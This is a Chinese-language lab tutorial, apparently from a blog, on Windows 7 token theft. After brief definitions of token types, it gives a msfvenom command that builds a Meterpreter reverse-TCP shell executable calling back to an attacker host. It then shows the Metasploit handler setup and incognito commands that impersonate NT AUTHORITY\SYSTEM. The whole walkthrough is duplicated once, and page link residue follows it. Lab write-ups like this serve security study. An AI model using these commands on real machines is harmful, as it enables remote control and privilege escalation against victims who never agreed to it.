令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

Windows7令牌窃取# Windows7令牌窃取

令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

Windows7令牌窃取

相关文章:

  • 2021-08-16
  • 2022-01-14
  • 2022-02-24
  • 2021-09-01
  • 2022-01-04
  • 2022-12-23
  • 2021-11-25
猜你喜欢
  • 2020-09-29
  • 2021-11-24
  • 2022-12-23
  • 2021-08-28
  • 2021-08-11
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案